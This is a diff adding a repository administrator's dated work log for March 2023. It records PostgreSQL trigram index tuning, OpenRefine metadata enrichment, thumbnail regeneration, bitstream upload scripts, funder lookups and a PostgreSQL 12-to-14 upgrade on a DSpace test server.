+<li>An unscientific comparison of duplicate checking Peter&rsquo;s file with ~500 titles on PostgreSQL 12 and PostgreSQL 14:
+<ul>
+<li>PostgreSQL 12: <code>0.11s user 0.04s system 0% cpu 19:24.65 total</code></li>
+<li>PostgreSQL 14: <code>0.12s user 0.04s system 0% cpu 18:13.47 total</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-03-08">2023-03-08</h2>
+<ul>
+<li>I am wondering how to speed up PostgreSQL trgm searches more
+<ul>
+<li>I see my local PostgreSQL is using vanilla configuration and I should update some configs:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ SELECT setting, unit FROM pg_settings WHERE name = &#39;shared_buffers&#39;;
+</span></span><span style="display:flex;"><span> setting │ unit 
+</span></span><span style="display:flex;"><span>─────────┼──────
+</span></span><span style="display:flex;"><span> 16384   │ 8kB
+</span></span><span style="display:flex;"><span>(1 row)
+</span></span></code></pre></div><ul>
+<li>I re-created my PostgreSQL 14 container with some extra memory settings:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman run --name dspacedb14 -v dspacedb14_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5432:5432 -d postgres:14-alpine -c shared_buffers<span style="color:#f92672">=</span>1024MB -c random_page_cost<span style="color:#f92672">=</span>1.1
+</span></span></code></pre></div><ul>
+<li>Then I created a GiST <a href="https://alexklibisz.com/2022/02/18/optimizing-postgres-trigram-search">index on the <code>metadatavalue</code> table to try to speed up the trgm similarity operations</a>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ CREATE INDEX metadatavalue_text_value_trgm_gist_idx ON metadatavalue USING gist(text_value gist_trgm_ops(siglen=64)); # \di+ shows index size is 795MB
+</span></span></code></pre></div><ul>
+<li>That took a few minutes to build&hellip; then the duplicate checker ran in 12 minutes: <code>0.07s user 0.02s system 0% cpu 12:43.08 total</code></li>
+<li>On a hunch, I tried with a GIN index:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ CREATE INDEX metadatavalue_text_value_trgm_gin_idx ON metadatavalue USING gin(text_value gin_trgm_ops); # \di+ shows index size is 274MB
+</span></span></code></pre></div><ul>
+<li>This ran in 19 minutes: <code>0.08s user 0.01s system 0% cpu 19:49.73 total</code>
+<ul>
+<li>So clearly the GiST index is better for this task</li>
+<li>I am curious if I increase the signature length in the GiST index from 64 to 256 (which will for sure increase the size taken):</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ CREATE INDEX metadatavalue_text_value_trgm_gist_idx ON metadatavalue USING gist(text_value gist_trgm_ops(siglen=256)); # \di+ shows index size is 716MB, which is less than the previous GiST index...
+</span></span></code></pre></div><ul>
+<li>This one finished in ten minutes: <code>0.07s user 0.02s system 0% cpu 10:04.04 total</code></li>
+<li>I might also want to <a href="https://stackoverflow.com/questions/43008382/postgresql-gin-index-slower-than-gist-for-pg-trgm">increase my <code>work_mem</code></a> (default 4MB):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ SELECT setting, unit FROM pg_settings WHERE name = &#39;work_mem&#39;;
+</span></span><span style="display:flex;"><span> setting │ unit 
+</span></span><span style="display:flex;"><span>─────────┼──────
+</span></span><span style="display:flex;"><span> 4096    │ kB
+</span></span><span style="display:flex;"><span>(1 row)
+</span></span></code></pre></div><ul>
+<li>After updating my Crossref lookup script and checking the remaining ~359 items I found a eight more duplicates already existing on CGSpace</li>
+<li>Wow, I found a <a href="https://programminghistorian.org/en/lessons/fetch-and-parse-data-with-openrefine#example-1-fetching-and-parsing-html">really cool way to fetch URLs in OpenRefine</a>
+<ul>
+<li>I used this to fetch the open access status for each DOI from Unpaywall</li>
+</ul>
+</li>
+<li>First, create a new column called &ldquo;url&rdquo; based on the DOI that builds the request URL. I used a Jython expression:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>unpaywall_baseurl <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;https://api.unpaywall.org/v2/&#39;</span>
+</span></span><span style="display:flex;"><span>email <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;a.orth+unpaywall@cgiar.org&#34;</span>
+</span></span><span style="display:flex;"><span>doi <span style="color:#f92672">=</span> value<span style="color:#f92672">.</span>replace(<span style="color:#e6db74">&#34;https://doi.org/&#34;</span>, <span style="color:#e6db74">&#34;&#34;</span>)
+</span></span><span style="display:flex;"><span>request_url <span style="color:#f92672">=</span> unpaywall_baseurl <span style="color:#f92672">+</span> doi <span style="color:#f92672">+</span> <span style="color:#e6db74">&#39;?email=&#39;</span> <span style="color:#f92672">+</span> email
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">return</span> request_url
+</span></span></code></pre></div><ul>
+<li>Then create a new column based on fetching the values in that column. I called it &ldquo;unpaywall_status&rdquo;</li>
+<li>Then you get a JSON blob in each and you can extract the Open Access status with a GREL like <code>value.parseJson()['is_oa']</code>
+<ul>
+<li>I checked a handful of results manually and found that the limited access status was more trustworthy from Unpaywall than the open access, so I will just tag the limited access ones</li>
+</ul>
+</li>
+<li>I merged the funders and affiliations from Altmetric into my file, then used the same technique to get Crossref data for open access items directly into OpenRefine and parsed the abstracts
+<ul>
+<li>The syntax was hairy because it&rsquo;s marked up with tags like <code>&lt;jats:p&gt;</code>, but this got me most of the way there:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.replace(&#34;jats:p&#34;, &#34;jats-p&#34;).parseHtml().select(&#34;jats-p&#34;)[0].innerHtml()
+</span></span><span style="display:flex;"><span>value.replace(&#34;&lt;jats:italic&gt;&#34;,&#34;&#34;).replace(&#34;&lt;/jats:italic&gt;&#34;, &#34;&#34;)
+</span></span><span style="display:flex;"><span>value.replace(&#34;&lt;jats:sub&gt;&#34;,&#34;&#34;).replace(&#34;&lt;/jats:sub&gt;&#34;, &#34;&#34;).replace(&#34;&lt;jats:sup&gt;&#34;,&#34;&#34;).replace(&#34;&lt;/jats:sup&gt;&#34;, &#34;&#34;)
+</span></span></code></pre></div><ul>
+<li>I uploaded the 350 items to DSpace Test so Peter and Abenet can explore them</li>
+<li>I exported a list of authors, affiliations, and funders from the new items to let Peter correct them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c dc.contributor.author /tmp/new-items.csv | sed -e 1d -e <span style="color:#e6db74">&#39;s/&#34;//g&#39;</span> -e <span style="color:#e6db74">&#39;s/||/\n/g&#39;</span> | sort | uniq -c | sort -nr | awk <span style="color:#e6db74">&#39;{$1=&#34;&#34;; print $0}&#39;</span> | sed -e <span style="color:#e6db74">&#39;s/^ //&#39;</span> &gt; /tmp/new-authors.csv
+</span></span></code></pre></div><ul>
+<li>Meeting with FAO AGRIS team about how to detect duplicates
+<ul>
+<li>They are currently using a sha256 hash on titles, which will work, but will only return exact matches</li>
+<li>I told them to try to normalize the string, drop stop words, etc to increase the possibility that the hash matches</li>
+</ul>
+</li>
+<li>Meeting with Abenet to discuss CGSpace issues
+<ul>
+<li>She reminded me about needing a metadata field for first author when the affiliation is ILRI</li>
+<li>I said I prefer to write a small script for her that will check the first author and first affiliation&hellip; I could do it easily in Python, but would need to put a web frontend on it for her</li>
+<li>Unless we could do that in AReS reports somehow</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-03-09">2023-03-09</h2>
+<ul>
+<li>Apply a bunch of corrections to authors, affiliations, and donors on the new items on DSpace Test</li>
+<li>Meeting with Peter and Abenet about future OpenRXV developments, DSpace 7, etc
+<ul>
+<li>I submitted an <a href="https://github.com/CodeObia/MEL/issues/11173">issue on MEL asking them to add provenance metadata when submitting to CGSpace</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-03-10">2023-03-10</h2>
+<ul>
+<li>CKM is getting ready to launch their new website and they display CGSpace thumbnails at 255x362px
+<ul>
+<li>Our thumbnails are 300px so they get up-scaled and look bad</li>
+<li>I realized that the last time we <a href="https://github.com/ilri/DSpace/commit/5de61e220124c1d0441c87cd7d36d18cb2293c03">increased the size of our thumbnails was in 2013</a>, from 94x130 to 300px</li>
+<li>I offered to CKM that we increase them again to 400 or 600px</li>
+<li>I did some tests to check the thumbnail file sizes for 300px, 400px, 500px, and 600px on <a href="https://hdl.handle.net/10568/126388">this item</a>:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ls -lh 10568-126388-*
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth  31K Mar 10 12:42 10568-126388-300px.jpg
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth  52K Mar 10 12:41 10568-126388-400px.jpg
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth  76K Mar 10 12:43 10568-126388-500px.jpg
+</span></span><span style="display:flex;"><span>-rw-r--r-- 1 aorth aorth 106K Mar 10 12:44 10568-126388-600px.jpg
+</span></span></code></pre></div><ul>
+<li>Seems like 600px is 3 to 4 times larger file size, so maybe we should shoot for 400px or 500px
+<ul>
+<li>I decided on 500px</li>
+<li>I started re-generating new thumbnails for the ILRI Publications, CGIAR Initiatives, and other collections</li>
+</ul>
+</li>
+<li>On that note, I also re-worked the XMLUI item display to show larger thumbnails (from a max-width of 128px to 200px)</li>
+<li>And now that I&rsquo;m looking at thumbnails I am curious what it would take to get DSpace to generate WebP or AVIF thumbnails</li>
+<li>Peter sent me citations and ILRI subjects for the 350 new ILRI publications
+<ul>
+<li>I guess he edited it in Excel because there are a bunch of encoding issues with accents</li>
+<li>I merged Peter&rsquo;s citations and subjects with the other metadata, ran one last duplicate check (and found one item!), then ran the items through csv-metadata-quality and uploaded them to CGSpace</li>
+<li>In the end it was only 348 items for some reason&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-03-12">2023-03-12</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-03-13">2023-03-13</h2>
+<ul>
+<li>Extract a list of DOIs from the Creative Commons licensed ILRI journal articles that I uploaded last week, skipping any that are &ldquo;no derivatives&rdquo; (ND):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;dc.description.provenance[en]&#39;</span> -m <span style="color:#e6db74">&#39;Made available in DSpace on 2023-03-10&#39;</span> /tmp/ilri-articles.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    | csvgrep -c &#39;dcterms.license[en_US]&#39; -r &#39;CC(0|\-BY)&#39;
+</span></span><span style="display:flex;"><span>    | csvgrep -c &#39;dcterms.license[en_US]&#39; -i -r &#39;\-ND\-&#39;
+</span></span><span style="display:flex;"><span>    | csvcut -c &#39;id,cg.identifier.doi[en_US],dcterms.type[en_US]&#39; &gt; 2023-03-13-journal-articles.csv
+</span></span></code></pre></div><ul>
+<li>I want to write a script to download the PDFs and create thumbnails for them, then upload to CGSpace
+<ul>
+<li>I wrote one based on <code>post_ciat_pdfs.py</code> but it seems there is an issue uploading anything other than a PDF</li>
+<li>When I upload a JPG or a PNG the file begins with:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Content-Disposition: form-data; name=&#34;file&#34;; filename=&#34;10.1017-s0031182013001625.pdf.jpg&#34;
+</span></span></code></pre></div><ul>
+<li>&hellip; this means it is invalid&hellip;
+<ul>
+<li>I tried in both the <code>ORIGINAL</code> and <code>THUMBNAIL</code> bundle, and with different filenames</li>
+<li>I tried manually on the command line with <code>http</code> and both PDF and PNG work&hellip; hmmmm</li>
+<li>Hmm, this seems to have been due to some difference in behavior between the <code>files</code> and <code>data</code> parameters of <code>requests.get()</code></li>
+<li>I finalized the <code>post_bitstreams.py</code> script and uploaded eighty-five PDF thumbnails</li>
+</ul>
+</li>
+<li>It seems Bizu uploaded covers for a handful so I deleted them and ran them through the script to get proper thumbnails</li>
+</ul>
+<h2 id="2023-03-14">2023-03-14</h2>
+<ul>
+<li>Add twelve IFPRI authors to our controlled vocabulary for authors and ORCID identifiers
+<ul>
+<li>I also tagged their existing items on CGSpace</li>
+</ul>
+</li>
+<li>Export all our ORCIDs and resolve their names to see if any have changed:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort -u &gt; /tmp/2023-03-14-orcids.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/resolve_orcids.py -i /tmp/2023-03-14-orcids.txt -o /tmp/2023-03-14-orcids-names.txt -d
+</span></span></code></pre></div><ul>
+<li>Then update them in the database:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/update_orcids.py -i /tmp/2023-03-14-orcids-names.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -m <span style="color:#ae81ff">247</span>
+</span></span></code></pre></div><h2 id="2023-03-15">2023-03-15</h2>
+<ul>
+<li>Jawoo was asking about possibilities to harvest PDFs from CGSpace for some kind of AI chatbot integration
+<ul>
+<li>I see we have 45,000 PDFs (format ID 2)</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ SELECT COUNT(*) FROM bitstream WHERE NOT deleted AND bitstream_format_id=2;
+</span></span><span style="display:flex;"><span> count 
+</span></span><span style="display:flex;"><span>───────
+</span></span><span style="display:flex;"><span> 45281
+</span></span><span style="display:flex;"><span>(1 row)
+</span></span></code></pre></div><ul>
+<li>Rework some of my Python scripts to use a common <code>db_connect</code> function from util</li>
+<li>I reworked my <code>post_bitstreams.py</code> script to be able to overwrite bitstreams if requested
+<ul>
+<li>The use case is to upload thumbnails for all the journal articles where we have these horrible pixelated journal covers</li>
+<li>I replaced JPEG thumbnails for ~896 ILRI publications by exporting a list of DOIs from the 10568/3 collection that were CC-BY, getting their PDFs from Sci-Hub, and then posting them with my new script</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-03-16">2023-03-16</h2>
+<ul>
+<li>Continue working on the ILRI publication thumbnails
+<ul>
+<li>There were about sixty-four that had existing PNG &ldquo;journal cover&rdquo; thumbnails that didn&rsquo;t get replaced because I only overwrote the JPEG ones yesterday</li>
+<li>Now I generated a list of those bitstream UUIDs and deleted them with a shell script via the REST API</li>
+</ul>
+</li>
+<li>I made a <a href="https://github.com/DSpace/DSpace/pull/8722">pull request on DSpace 7 to update the bitstream format registry for PNG, WebP, and AVIF</a></li>
+<li>Export CGSpace to perform mappings to Initiatives collections</li>
+<li>I also used this export to find CC-BY items with DOIs that had JPEGs or PNGs in their provenance, meaning that the submitter likely submitted a low-quality &ldquo;journal cover&rdquo; for the item
+<ul>
+<li>I found about 330 of them and got most of their PDFs from Sci-Hub and replaced the crappy thumbnails with real ones where Sci-Hub had them (~245)</li>
+</ul>
+</li>
+<li>In related news, I realized you can get an <a href="https://stackoverflow.com/questions/59202176/python-download-papers-from-sciencedirect-by-doi-with-requests">API key from Elsevier and download the PDFs from their API</a>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> requests
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span>api_key <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;fuuuuuuuuu&#39;</span>
+</span></span><span style="display:flex;"><span>doi <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;10.1016/j.foodqual.2021.104362&#34;</span>
+</span></span><span style="display:flex;"><span>request_url <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#39;https://api.elsevier.com/content/article/doi:</span><span style="color:#e6db74">{</span>doi<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;</span>
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span>headers <span style="color:#f92672">=</span> {
+</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#39;X-ELS-APIKEY&#39;</span>: api_key,
+</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#39;Accept&#39;</span>: <span style="color:#e6db74">&#39;application/pdf&#39;</span>
+</span></span><span style="display:flex;"><span>}
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">with</span> requests<span style="color:#f92672">.</span>get(request_url, stream<span style="color:#f92672">=</span><span style="color:#66d9ef">True</span>, headers<span style="color:#f92672">=</span>headers) <span style="color:#66d9ef">as</span> r:
+</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> r<span style="color:#f92672">.</span>status_code <span style="color:#f92672">==</span> <span style="color:#ae81ff">200</span>:
+</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">with</span> open(<span style="color:#e6db74">&#34;article.pdf&#34;</span>, <span style="color:#e6db74">&#34;wb&#34;</span>) <span style="color:#66d9ef">as</span> f:
+</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">for</span> chunk <span style="color:#f92672">in</span> r<span style="color:#f92672">.</span>iter_content(chunk_size<span style="color:#f92672">=</span><span style="color:#ae81ff">1024</span><span style="color:#f92672">*</span><span style="color:#ae81ff">1024</span>):
+</span></span><span style="display:flex;"><span>                f<span style="color:#f92672">.</span>write(chunk)
+</span></span></code></pre></div><ul>
+<li>The question is, how do we know if a DOI is Elsevier or not&hellip;</li>
+<li>CGIAR Repositories Working Group meeting
+<ul>
+<li>We discussed controlled vocabularies for funders</li>
+<li>I suggested checking our combined lists against Crossref and ROR</li>
+</ul>
+</li>
+<li>Export a list of donors from <code>cg.contributor.donor</code> on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=248) to /tmp/2023-03-16-donors.txt;
+</span></span><span style="display:flex;"><span>COPY 1521
+</span></span></code></pre></div><ul>
+<li>Then resolve them against Crossref&rsquo;s funders API:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/crossref_funders_lookup.py -e fuuuu@cgiar.org -i /tmp/2023-03-16-donors.txt -o ~/Downloads/2023-03-16-cgspace-crossref-funders-results.csv -d
+</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true ~/Downloads/2023-03-16-cgspace-crossref-funders-results.csv | wc -l
+</span></span><span style="display:flex;"><span>472
+</span></span><span style="display:flex;"><span>$ sed 1d ~/Downloads/2023-03-16-cgspace-crossref-funders-results.csv | wc -l 
+</span></span><span style="display:flex;"><span>1521
+</span></span></code></pre></div><ul>
+<li>That&rsquo;s a 31% hit rate, but I see some simple things like &ldquo;Bill and Melinda Gates Foundation&rdquo; instead of &ldquo;Bill &amp; Melinda Gates Foundation&rdquo;</li>
+</ul>
+<h2 id="2023-03-17">2023-03-17</h2>
+<ul>
+<li>I did the same lookup of CGSpace donors on ROR&rsquo;s 2022-12-01 data dump:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/ror_lookup.py -i /tmp/2023-03-16-donors.txt -o ~/Downloads/2023-03-16-cgspace-ror-funders-results.csv -r v1.15-2022-12-01-ror-data.json
+</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true ~/Downloads/2023-03-16-cgspace-ror-funders-results.csv | wc -l                                            
+</span></span><span style="display:flex;"><span>407
+</span></span><span style="display:flex;"><span>$ sed 1d ~/Downloads/2023-03-16-cgspace-ror-funders-results.csv | wc -l
+</span></span><span style="display:flex;"><span>1521
+</span></span></code></pre></div><ul>
+<li>That&rsquo;s a 26.7% hit rate</li>
+<li>As for the number of funders in each dataset
+<ul>
+<li>Crossref has about 34,000</li>
+<li>ROR has 15,000 if &ldquo;FundRef&rdquo; data is a proxy for that:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c -rsI FundRef v1.15-2022-12-01-ror-data.json    
+</span></span><span style="display:flex;"><span>15162
+</span></span></code></pre></div><ul>
+<li>On a related note, I remembered that DOI.org has a list of DOI prefixes and publishers: <a href="https://doi.crossref.org/getPrefixPublisher">https://doi.crossref.org/getPrefixPublisher</a>
+<ul>
+<li>In Python I can look up publishers by prefix easily, here with a nested list comprehension:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>In [10]: [publisher for publisher in publishers if &#39;10.3390&#39; in publisher[&#39;prefixes&#39;]]
+</span></span><span style="display:flex;"><span>Out[10]: 
+</span></span><span style="display:flex;"><span>[{&#39;prefixes&#39;: [&#39;10.1989&#39;, &#39;10.32545&#39;, &#39;10.20944&#39;, &#39;10.3390&#39;, &#39;10.35995&#39;],
+</span></span><span style="display:flex;"><span>  &#39;name&#39;: &#39;MDPI AG&#39;,
+</span></span><span style="display:flex;"><span>  &#39;memberId&#39;: 1968}]
+</span></span></code></pre></div><ul>
+<li>And in OpenRefine, if I create a new column based on the DOI using Jython:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> json
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">with</span> open(<span style="color:#e6db74">&#34;/home/aorth/src/git/DSpace/publisher-doi-prefixes.json&#34;</span>, <span style="color:#e6db74">&#34;rb&#34;</span>) <span style="color:#66d9ef">as</span> f:
+</span></span><span style="display:flex;"><span>    publishers <span style="color:#f92672">=</span> json<span style="color:#f92672">.</span>load(f)
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span>doi_prefix <span style="color:#f92672">=</span> value<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#34;/&#34;</span>)[<span style="color:#ae81ff">3</span>]
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span>publisher <span style="color:#f92672">=</span> [publisher <span style="color:#66d9ef">for</span> publisher <span style="color:#f92672">in</span> publishers <span style="color:#66d9ef">if</span> doi_prefix <span style="color:#f92672">in</span> publisher[<span style="color:#e6db74">&#39;prefixes&#39;</span>]]
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">return</span> publisher[<span style="color:#ae81ff">0</span>][<span style="color:#e6db74">&#39;name&#39;</span>]
+</span></span></code></pre></div><ul>
+<li>&hellip; though this is very slow and hung OpenRefine when I tried it</li>
+<li>I added the ability to overwrite multiple bitstream formats at once in <code>post_bitstreams.py</code></li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/post_bitstreams.py -i test.csv -u https://dspacetest.cgiar.org/rest -e fuuu@example.com -p <span style="color:#e6db74">&#39;fffnjnjn&#39;</span> -d -s 2B40C7C4E34CEFCF5AFAE4B75A8C52E2 --overwrite JPEG --overwrite PNG -n
+</span></span><span style="display:flex;"><span>Session valid: 2B40C7C4E34CEFCF5AFAE4B75A8C52E2
+</span></span><span style="display:flex;"><span>Opened test.csv
+</span></span><span style="display:flex;"><span>384142cb-58b9-4e64-bcdc-0a8cc34888b3: checking for existing bitstreams in THUMBNAIL bundle
+</span></span><span style="display:flex;"><span>&gt; <span style="color:#f92672">(</span>DRY RUN<span style="color:#f92672">)</span> Deleting bitstream: IFPRI Malawi_Maize Market Report_February_202_anonymous.pdf.jpg <span style="color:#f92672">(</span>16883cb0-1fc8-4786-a04f-32132e0617d4<span style="color:#f92672">)</span>
+</span></span><span style="display:flex;"><span>&gt; <span style="color:#f92672">(</span>DRY RUN<span style="color:#f92672">)</span> Deleting bitstream: AgroEcol_Newsletter_2.png <span style="color:#f92672">(</span>7e9cd434-45a6-4d55-8d56-4efa89d73813<span style="color:#f92672">)</span>
+</span></span><span style="display:flex;"><span>&gt; <span style="color:#f92672">(</span>DRY RUN<span style="color:#f92672">)</span> Uploading file: 10568-129666.pdf.jpg
+</span></span></code></pre></div><ul>
+<li>I learned how to use Python&rsquo;s built-in <code>logging</code> module and it simplifies all my debug and info printing
+<ul>
+<li>I re-factored a few scripts to use the new logging</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-03-18">2023-03-18</h2>
+<ul>
+<li>I applied changes for publishers on 16,000 items in batches of 5,000</li>
+<li>While working on my <code>post_bitstreams.py</code> script I realized the Tomcat Crawler Session Manager valve that groups bot user agents into sessions is causing my login to fail the first time, every time
+<ul>
+<li>I&rsquo;ve disabled it for now and will check the Munin session graphs after some time to see if it makes a difference</li>
+<li>In any case I have much better spider user agent lists in DSpace now than I did years ago when I started using the Crawler Session Manager valve</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-03-19">2023-03-19</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-03-20">2023-03-20</h2>
+<ul>
+<li>Minor updates to a few of my DSpace Python scripts to fix the logging</li>
+<li>Minor updates to some records for Mazingira reported by Sonja</li>
+<li>Upgrade PostgreSQL on DSpace Test from version 12 to 14, the same way I did from 10 to 12 last year:
+<ul>
+<li>First, I installed the new version of PostgreSQL via the Ansible playbook scripts</li>
+<li>Then I stopped Tomcat and all PostgreSQL clusters and used <code>pg_upgrade</code> to upgrade the old version:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># systemctl stop tomcat7
+</span></span><span style="display:flex;"><span># pg_ctlcluster <span style="color:#ae81ff">12</span> main stop
+</span></span><span style="display:flex;"><span># tar -cvzpf var-lib-postgresql-12.tar.gz /var/lib/postgresql/12
+</span></span><span style="display:flex;"><span># tar -cvzpf etc-postgresql-12.tar.gz /etc/postgresql/12
+</span></span><span style="display:flex;"><span># pg_ctlcluster <span style="color:#ae81ff">14</span> main stop
+</span></span><span style="display:flex;"><span># pg_dropcluster <span style="color:#ae81ff">14</span> main
+</span></span><span style="display:flex;"><span># pg_upgradecluster <span style="color:#ae81ff">12</span> main
+</span></span><span style="display:flex;"><span># pg_ctlcluster <span style="color:#ae81ff">14</span> main start
+</span></span></code></pre></div><ul>
